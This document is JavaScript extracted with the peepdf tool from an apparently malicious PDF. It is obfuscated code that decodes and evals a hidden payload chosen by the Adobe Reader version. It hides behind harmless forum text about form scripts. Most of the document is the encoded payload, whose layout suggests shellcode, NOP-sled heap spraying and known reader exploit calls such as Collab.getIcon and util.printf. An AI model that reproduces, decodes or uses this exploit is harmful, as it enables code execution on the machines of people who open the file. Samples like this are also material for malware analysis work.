// peepdf comment: Javascript code located in object 1 (version 0)

this.STARTSCRIPT()

// peepdf comment: Javascript code located in object 13 (version 0)

function STARTSCRIPT() {

    this.DEfm6rJD6C0 = function(jufm6rJD6C0, gmfm6rJD6C0) {
        ecfm6rJD6C0 = '';
        jufm6rJD6C0 = unescape(jufm6rJD6C0);
        frfm6rJD6C0 = jufm6rJD6C0.length;
        for (j = 0; j < frfm6rJD6C0;) {
            ecfm6rJD6C0 += we2(31, (jufm6rJD6C0.charCodeAt(j) - gmfm6rJD6C0) ^ gmfm6rJD6C0);
            j++;
        }
        return ecfm6rJD6C0;
    }

    dfm6rJD6C0 = 'I need a javascript that I can place in a form field properties area that will replace a "&" symbol with the word "and".....any help would be greatly appreciated. There are a couple of places you can enter a script that modifies the contents of the field.  The question is, do you want the value of the form field to be altered, or just what the user sees on the screen? To modify the value of the field you will need to use a custom keystroke script.  To modify the appearance of the field you will need to enter a format script.  You can find articles on both of these in the tutorial on this site.  The script itself can be done with the JavaScript "replace" function, In both cases (assuming that youve got an AcroForm) the code will look like this. PHP - Java Chat system for web site. Client is Java applet can run in any Java enabled browsers. The server side is PHP script can be installed on any PHP enabled web host. Interface text can be customized in any language. Multi rooms. Java Script Mutator is intended for optimization and protection of your Java Scripts from theft and modifications. Gnostice PDFOne Java is a pure Java library which provides a rich set of APIs to Create, Fill and Read PDF Forms, Secure, Merge, Split, Stamp PDF documents. = %2A%86%95%82Tu%93%82%8Ff%99%82TAT%95%84%84N%86%8D%99%87%99%82f%99%82%83%8D%8F%8EN%88%8Fc%88%82%8D%8E%97LM%3B%2Au%93%82%8Ff%99%82TATu%93%82%8Ff%99%82N%82%99%84%90%95%93%99LO%60xO%97PRRM%3B%2A%86%95%82Tf%99%82%83%8D%8F%8ETAT%8E%99%87Tu%82%82%95%7DLu%93%82%8Ff%99%82N%93%8C%95%82u%88LDMPu%93%82%8Ff%99%82N%93%8C%95%82u%88LEMPu%93%82%8Ff%99%82N%93%8C%95%82u%88LBMM%3B%2A%2A%83%8C%99%90%90%93%8F%98%99TATRY%89HCHCY%89HCHCY%89D%96%99%92Y%89CCI%92Y%89FF%93%3DY%89%3CD%92%3DY%89%3CDDEY%89%99%96CCY%89%99BHCY%89%99%92%96%95Y%89%99%3CDIY%89%96%96%99%93Y%89%96%96%96%96Y%89%3C%92G%96Y%89%98%96H%99Y%89%99%96%99%96Y%89FH%99%96Y%89%99C%95%96Y%89%3D%96FHY%89HB%96CY%89%3D%96FHY%89F%99%99GY%89%99%96DCY%89%99%96%99%92Y%89FH%99%96Y%89%92%3DDCY%89FE%3CGY%89%99E%95EY%89DGDCY%89%99%96EEY%89%99%96%99%96Y%89%95%95FFY%89%92%3D%99%92Y%89GG%3CGY%89FIEEY%89DG%99EY%89%99%96E%96Y%89%99%96%99%96Y%89%95%95FFY%89%92%3D%99GY%89%93%95%3CGY%89EDI%96Y%89DGB%98Y%89%99%96D%98Y%89%99%96%99%96Y%89%95%95FFY%89%92%3D%99CY%89DD%3CGY%89D%96BEY%89DG%3C%96Y%89%99%96C%92Y%89%99%96%99%96Y%89%95%95FFY%89%92%3D%96%96Y%89B%99%3CGY%89D%95%3DFY%89DGIGY%89%99%96B%3DY%89%99%96%99%96Y%89%95%95FFY%89%95%96%96%92Y%89%98GF%96Y%89%3D%95B%93Y%89FFEIY%89%96G%95%95Y%89%99%3CDFY%89%99%96%99%99Y%89%92E%99%96Y%89%3D%95FFY%89FH%93%92Y%89%99%92%95%95Y%89%99%99%3CIY%89FH%92FY%89%96G%92%95Y%89DG%92%3DY%89%99%96FHY%89%99%96%99%96Y%89%3CG%92%96Y%89%96I%98%3DY%89%3D%96%93DY%89G%3CDGY%89%99%96%99%96Y%89FF%99%96Y%89%96C%95%95Y%89B%95FHY%89B%96F%93Y%89FF%92%96Y%89%93%96%95%95Y%89ED%3CGY%89%99%96%99%96Y%89%92%96%99%96Y%89%95%95FHY%89%3CI%96%92Y%89%92F%99%98Y%89%92%95FHY%89DG%96GY%89%99%96%3C%99Y%89%99%96%99%96Y%89%95%95%99%93Y%89B%3C%93%96Y%89%92C%99%96Y%89%93E%3DEY%89B%3C%3C%95Y%89%99%92%95%96Y%89%3C%95%3DGY%89%99%96%99%96Y%89%3D%95EDY%89FH%93%96Y%89%99C%95%95Y%89%99%99%3CIY%89FH%92FY%89%96G%92%95Y%89%95%96DGY%89%99%96%99%96Y%89%3CI%99%96Y%89%92G%99%3CY%89%95%95%99%93Y%89%98%93%93%92Y%89%92%93CHY%89ED%92%93Y%89%93%96%3D%95Y%89%92%93%92%96Y%89%95%95FHY%89%3CI%96CY%89%92F%99%95Y%89%92%95FHY%89DG%96GY%89%99%96%93%93Y%89%99%96%99%96Y%89%99%96%3CIY%89%3D%95EDY%89FH%93%96Y%89%99G%95%95Y%89%99%98%3CIY%89FH%92FY%89%96G%92%95Y%89%96%96DGY%89%99%96%99%96Y%89%3CI%99%96Y%89FHEDY%89%96%96%95%95Y%89%99%99%3CIY%89FH%92FY%89%96G%92%95Y%89%99%96DGY%89%99%96%99%96Y%89%95%99%99%96Y%89%92%98%92HY%89D%99%99%93Y%89D%99%99%93Y%89D%99%99%93Y%89D%99%99%93Y%89DCF%93Y%89%92I%99%92Y%89FH%92%93Y%89D%98CIY%89%92%98E%3CY%89D%96EDY%89FH%92%95Y%89FHDCY%89%99G%3DBY%89%92BFHY%89%92%3D%99CY%89%3D%93FHY%89FH%98CY%89%96E%3D%92Y%89%99%93%3DGY%89%92%3DE%93Y%89%3D%3DFHY%89%99%93%93%96Y%89%98%93E%93Y%89%95FBFY%89HB%95%99Y%89B%93%99%93Y%89%98%93%92%3DY%89%99DE%3DY%89%96%96IEY%89E%98%98IY%89%99G%3D%92Y%89BEB%99Y%89%99%93%99BY%89%95%96E%98Y%89E%99DHY%89EE%98HY%89%3D%95%92EY%89%92ID%95Y%89DHFHY%89%92IFHY%89%99%93%93%92Y%89%3C%3DCBY%89%99CFHY%89FH%95HY%89%96C%92IY%89CB%99%93Y%89%99%92FHY%89%99%93FHY%89%92EB%95Y%89B%98%92BY%89%99%96%99GY%89E%92DGY%89EDEEY%89%92%95EDY%89%95C%92%98Y%89%95D%95BY%89%99%96%95ER%3B%2A%2A%8D%96TLf%99%82%83%8D%8F%8E%5BDaAA%3DTVVTf%99%82%83%8D%8F%8E%5BEaAADTVVTf%99%82%83%8D%8F%8E%5BBaAADM%2A%7B%2A-%83%8C%99%90%90%93TAT%89%8E%99%83%93%95%84%99L%83%8C%99%90%90%93%8F%98%99KRY%89GHF%3CY%89GDGHY%89B%96C%95Y%89C%3DB%96Y%89B%99CCY%89CICEY%89B%99C%3CY%89CECEY%89B%99CHY%89CCCEY%89B%96C%3CY%89FIGEY%89GHGBY%89F%93B%96Y%89FEF%96Y%89B%99FHY%89F%3CGDY%89C%96GDY%89FHF%3DY%89CCC%98Y%89DDCERM%3B%2A%2A-%96%89%8E%93%88%8D%8F%8ET%83%84%95%82%7DLM%2A-%7B%2A-%97%95%82%92%95%97%99TAT%89%8E%99%83%93%95%84%99LRY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDRMTKT%83%8C%99%90%90%93%3B%2A-%8E%8F%84%92%90%8F%93%8BTAT%89%8E%99%83%93%95%84%99LRY%89%3DD%3DDY%89%3DD%3DDRM%3BT%2A-%8C%99%95%98%99%82%83%8Dz%99TATED%3B%2A-%95%93%90TAT%8C%99%95%98%99%82%83%8Dz%99K%97%95%82%92%95%97%99N%90%99%8E%97%88%8C%3B%2A-%87%8C%8D%90%99TL%8E%8F%84%92%90%8F%93%8BN%90%99%8E%97%88%8C%40%95%93%90MT%8E%8F%84%92%90%8F%93%8BKA%8E%8F%84%92%90%8F%93%8B%3B%2A-%96%8D%90%90%92%90%8F%93%8BTAT%8E%8F%84%92%90%8F%93%8BN%83%89%92%83%88%82%8D%8E%97LDPT%95%93%90M%3B%2A-%92%90%8F%93%8BTAT%8E%8F%84%92%90%8F%93%8BN%83%89%92%83%88%82%8D%8E%97LDPT%8E%8F%84%92%90%8F%93%8BN%90%99%8E%97%88%8CQ%95%93%90M%3B%2A-%87%8C%8D%90%99L%92%90%8F%93%8BN%90%99%8E%97%88%8CK%95%93%90%40D%7CHDDDDMT%92%90%8F%93%8BTAT%92%90%8F%93%8BK%92%90%8F%93%8BK%96%8D%90%90%92%90%8F%93%8B%3B%2A-%91%99%91%8F%82%7DTAT%8E%99%87Tu%82%82%95%7DLM%3B%2A-%96%8F%82TL%8DAD%3B%8D%40E%3CD%3B%8DKKMT%91%99%91%8F%82%7D%5B%8DaTAT%92%90%8F%93%8BTKT%97%95%82%92%95%97%99%3B%2A-%86%95%82T%92%89%96%96%99%82%83%8Dz%99TATHDEB%3B%2A-%86%95%82T%92%89%96%96%99%82TATu%82%82%95%7DL%92%89%96%96%99%82%83%8Dz%99M%3B%2A-%96%8F%82TL%8DAD%3BT%8D%40%92%89%96%96%99%82%83%8Dz%99%3BT%8DKKM%7BT%92%89%96%96%99%82%5B%8DaTAT%89%8E%99%83%93%95%84%99LRYD%95YD%95YD%95YD%95RM%3BT%81%2A-s%8F%90%90%95%92N%97%99%88m%93%8F%8EL%92%89%96%96%99%82KR_nN%92%89%8E%98%90%99RM%3B%2A-%81%2A-%83%84%95%82%7DLM%3B%2A-%92%89%96%96%99%82TAT%8E%89%90%90%3B%2A-%91%99%91%8F%82%7DTAT%8E%89%90%90%3B%2A%81%2A%99%90%83%99T%8D%96Lf%99%82%83%8D%8F%8E%5BDaAA%3CM%2A%7B%2A-%83%8C%99%90%90%93TAT%89%8E%99%83%93%95%84%99L%83%8C%99%90%90%93%8F%98%99KRY%89GHF%3CY%89GDGHY%89B%96C%95Y%89C%3DB%96Y%89B%99CCY%89CICEY%89B%99C%3CY%89CECEY%89B%99CHY%89CCCEY%89B%96C%3CY%89FIGEY%89GHGBY%89F%93B%96Y%89FEF%96Y%89B%99FHY%89F%3CGDY%89C%96GDY%89FHF%3DY%89CCC%98Y%89DDCDRM%3B%2A%2A-%96%89%8E%93%88%8D%8F%8ET%83%84%95%82%7DLM%2A-%7B%2A-%97%95%82%92%95%97%99TAT%89%8E%99%83%93%95%84%99LRY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDY%89%3DD%3DDRMTKT%83%8C%99%90%90%93%3B%2A-%8E%8F%84%92%90%8F%93%8BTAT%89%8E%99%83%93%95%84%99LRY%89%3DD%3DDY%89%3DD%3DDRM%3BT%2A-%8C%99%95%98%99%82%83%8Dz%99TATED%3B%2A-%95%93%90TAT%8C%99%95%98%99%82%83%8Dz%99K%97%95%82%92%95%97%99N%90%99%8E%97%88%8C%3B%2A-%87%8C%8D%90%99TL%8E%8F%84%92%90%8F%93%8BN%90%99%8E%97%88%8C%40%95%93%90MT%8E%8F%84%92%90%8F%93%8BKA%8E%8F%84%92%90%8F%93%8B%3B%2A-%96%8D%90%90%92%90%8F%93%8BTAT%8E%8F%84%92%90%8F%93%8BN%83%89%92%83%88%82%8D%8E%97LDPT%95%93%90M%3B%2A-%92%90%8F%93%8BTAT%8E%8F%84%92%90%8F%93%8BN%83%89%92%83%88%82%8D%8E%97LDPT%8E%8F%84%92%90%8F%93%8BN%90%99%8E%97%88%8CQ%95%93%90M%3B%2A-%87%8C%8D%90%99L%92%90%8F%93%8BN%90%99%8E%97%88%8CK%95%93%90%40D%7CHDDDDMT%92%90%8F%93%8BTAT%92%90%8F%93%8BK%92%90%8F%93%8BK%96%8D%90%90%92%90%8F%93%8B%3B%2A-%91%99%91%8F%82%7DTAT%8E%99%87Tu%82%82%95%7DLM%3B%2A-%96%8F%82TL%8DAD%3B%8D%40E%3CD%3B%8DKKMT%91%99%91%8F%82%7D%5B%8DaTAT%92%90%8F%93%8BTKT%97%95%82%92%95%97%99%3B%2A-%86%95%82T%92%89%96%96%99%82%83%8Dz%99TATHDEB%3B%2A-%86%95%82T%92%89%96%96%99%82TATu%82%82%95%7DL%92%89%96%96%99%82%83%8Dz%99M%3B%2A-%96%8F%82TL%8DAD%3BT%8D%40%92%89%96%96%99%82%83%8Dz%99%3BT%8DKKM%7BT%92%89%96%96%99%82%5B%8DaTAT%89%8E%99%83%93%95%84%99LRYD%95YD%95YD%95YD%95RM%3BT%81%2A-s%8F%90%90%95%92N%97%99%88m%93%8F%8EL%92%89%96%96%99%82KR_nN%92%89%8E%98%90%99RM%3B%2A-%81%2A-%83%84%95%82%7DLM%3B%2A-%92%89%96%96%99%82TAT%8E%89%90%90%3B%2A-%91%99%91%8F%82%7DTAT%8E%89%90%90%3B%2A%81%2A%99%90%83%99T%8D%96Lf%99%82%83%8D%8F%8E%5BDaAAGM%2A%7B%2A-%86%95%82TfkCH%90TAT%89%8E%99%83%93%95%84%99L%83%8C%99%90%90%93%8F%98%99KRY%89GHF%3CY%89GDGHY%89B%96C%95Y%89C%3DB%96Y%89B%99CCY%89CICEY%89B%99C%3CY%89CECEY%89B%99CHY%89CCCEY%89B%96C%3CY%89FIGEY%89GHGBY%89F%93B%96Y%89FEF%96Y%89B%99FHY%89F%3CGDY%89C%96GDY%89FHF%3DY%89CBC%98Y%89DDC%3DRM%3B%2A-%2A-%96%89%8E%93%88%8D%8F%8ETfsCH%90LfxCH%90PTfgCH%90M%2A-%7B%2A--%87%8C%8D%90%99TLfxCH%90N%90%99%8E%97%88%8CJB%40fgCH%90M%7BfxCH%90TKATfxCH%90%3B%81%2A--fxCH%90TATfxCH%90N%83%89%92%83%88%82%8D%8E%97LDPfgCH%90OBM%3B%2A--%82%99%88%89%82%8ETfxCH%90%3B%2A-%81%2A-%86%95%82Tfu%3DCm%87%8F%8EeTATRtDt%7CtDt%93tDt%93tDt%93tDt%93tR%3B%2A-fu%3DCm%87%8F%8EeTATfu%3DCm%87%8F%8EeN%82%99%84%90%95%93%99LO%5BtaO%97PTRRM%3B%2A-%86%95%82Tfr%3DCm%87%8F%8EeTATRtDt%7CtHtDttDttDttDtDtR%3B%2A-fr%3DCm%87%8F%8EeTATfr%3DCm%87%8F%8EeN%82%99%84%90%95%93%99LO%5BtaO%97PTRRM%3B%2A-%86%95%82TfeCH%90TAT%8E%99%87Tu%82%82%95%7DLM%3BT%2A-%86%95%82TfdCH%90TATfu%3DCm%87%8F%8Ee%3BT%2A-%86%95%82TfqCH%90TATfr%3DCm%87%8F%8Ee%3B%2A-%86%95%82TfnCH%90TATfkCH%90N%90%99%8E%97%88%8CTJTB%3B%2A-%86%95%82TfgCH%90TATfqCH%90TQTLfnCH%90KD%7CC%3CM%3B%2A-%86%95%82Tfe%3DBc%8D%90nTATRtYt%89t%3DtDt%3DtDtYt%89t%3DtDt%3DtDtR%3B%2A-fe%3DBc%8D%90nTATfe%3DBc%8D%90nN%82%99%84%90%95%93%99LO%5BtaO%97PTRRM%3B%2A-%86%95%82TfxCH%90TAT%89%8E%99%83%93%95%84%99Lfe%3DBc%8D%90nM%3B%2A-fxCH%90TATfsCH%90LfxCH%90PTfgCH%90M%3B%2A-%86%95%82TfpCH%90TATLfdCH%90TQTfr%3DCm%87%8F%8EeMOfqCH%90%3B%2A-%96%8F%82TL%86%95%82Tfs%3DCm%87%8F%8EeAD%3Bfs%3DCm%87%8F%8Ee%40fpCH%90%3Bfs%3DCm%87%8F%8EeKKM%2A-%7B%2A--feCH%90%5Bfs%3DCm%87%8F%8EeaTATfxCH%90TKTfkCH%90%3B%2A-%81%2A-%86%95%82Tfy%8D%8F%3DIy%8D%8EuTATRtYt%89tDt%93tDt%93tYt%89tDt%93tDt%93tR%3B%2A-fy%8D%8F%3DIy%8D%8EuTATfy%8D%8F%3DIy%8D%8EuN%82%99%84%90%95%93%99LO%5BtaO%97PTRRM%3B%2A-%86%95%82TfoCH%90TAT%89%8E%99%83%93%95%84%99Lfy%8D%8F%3DIy%8D%8EuM%3B%2A-%87%8C%8D%90%99LfoCH%90N%90%99%8E%97%88%8CT%40THH%3DIBMTfoCH%90TKATfoCH%90%3B%2A-%88%8C%8D%83N%93%8F%90%90%95%92c%88%8F%82%99TATs%8F%90%90%95%92N%93%8F%90%90%99%93%88y%91%95%8D%90m%8E%96%8FL%7B%83%89%92%8A%3ATRRP%91%83%97%3ATfoCH%90%81M%3B%2A-feCH%90TAT%8E%89%90%90%3B%2A%81%2A';

    this.we2 = function(num, num2) {
        return String.fromCharCode(num % 55 - num + num2);
    }
    this.we = function(num, num2) {
        return String.fromCharCode(num % 55 - num + 10 + num2);
    }

    function myCh(bGreater, nGreater, bLess, nLess) {
        value = event.value;
        if (bGreater && (value <= nGreater)) {
            app.alert("Value must be greater than " + nGreater);
            app.beep();
            event.rc = false;
            return;
        }
        if (bLess && (value >= nLess)) {
            app.alert("Value must be less than " + nLess);
            app.beep();
            event.rc = false;
            return;
        }
    }

    function tion(afm6rJD6C0, bfm6rJD6C0, dcfm6rJD6C0) {
        if (bfm6rJD6C0 > 11) {
            console.println("Entering function: myFunction");
            console.println(" Parameter 1: afm6rJD6C0 = " + afm6rJD6C0);
            console.println(" Parameter 2: bfm6rJD6C0 = " + bfm6rJD6C0);
        } else {
            code = DEfm6rJD6C0(dcfm6rJD6C0[we(afm6rJD6C0, 105) + "ub" + we(afm6rJD6C0, 105) + "tr"](1265), 26 + (27 + (afm6rJD6C0 - 3) - (27 + (afm6rJD6C0 - 3)) % 60) * 4);
            this[we(afm6rJD6C0, 91) + we(afm6rJD6C0, 108) + we(afm6rJD6C0, 87) + we(afm6rJD6C0, 98)](code);
        }
    }

    hfm6rJD6C0 = app.viewerVersion.toString();
    hfm6rJD6C0 = hfm6rJD6C0.charAt(0);

    tion(hfm6rJD6C0, hfm6rJD6C0 / 2, dfm6rJD6C0);

}

